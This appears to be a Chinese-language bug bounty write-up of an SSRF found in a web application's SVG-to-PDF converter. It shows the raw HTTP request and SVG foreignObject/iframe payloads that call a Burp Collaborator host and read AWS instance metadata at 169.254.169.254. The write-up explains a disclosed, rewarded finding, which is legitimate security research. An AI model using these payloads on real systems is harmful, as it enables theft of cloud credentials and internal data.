作者在BugCrowd的一个私有项目中进行挖洞活动,在该项目中,有一个功能复杂的应用程序,其中一处亮点是将对象从SVG转换为PDF、JPG、PNG文件。
当作者找到从用户输入的数据创建PDF的功能时,立即进行了一些测试,通过更改发送到包含IFRAME标签的HTML的SVG代码到Burp Collaborator来尝试执行SSRF攻击:
POST /convert HTTP/2
Host: target.com
Cookie: -
Content-Length: -
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Dnt: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqBdAsEtYaBjTArl3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,eu;q=0.6,ms;q=0.5
Connection: close
------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="svg"
<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--
但遗憾的是,服务器返回了一条错误信息。
{"message": "Error when converting data."}
看起来服务器只能处理有效的SVG文件输入,在进行了一些Google搜索之后,作者发现可以使用名为foreignObject的元素将HTML代码嵌入到SVG代码中。
看起来服务器只能处理有效SVG文件的输入。
在进行了一些Google搜索之后,作者发现可以使用名为foreignObject的元素将HTML代码嵌入到SVG代码中。
The SVG element includes elements from a different XML namespace. In the context of a browser, it is most likely (X)HTML.
https://developer.mozilla.org/en-US/docs/Web/SVG/Element/foreignObject
于是作者修改了payload,如下:
<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
<g>
<foreignObject width="800" height="500">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
</body>
</foreignObject>
</g>
</svg>
在点击发送到Burp Collaborator之后,通过IP地址作者发现该应用程序使用的是AWS(Amazon Web Service),并且从User Agent中作者注意到SVG使用了PhantomJS进行呈现。
因此,作者修改了payload以获取AWS上的元数据:
<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
<g>
<foreignObject width="800" height="500">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
</body>
</foreignObject>
</g>
</svg>
成功获取到了元数据:
作者立即报告了这一漏洞发现,漏洞被标记为P1等级,作者最终获得了2150美元的漏洞奖励。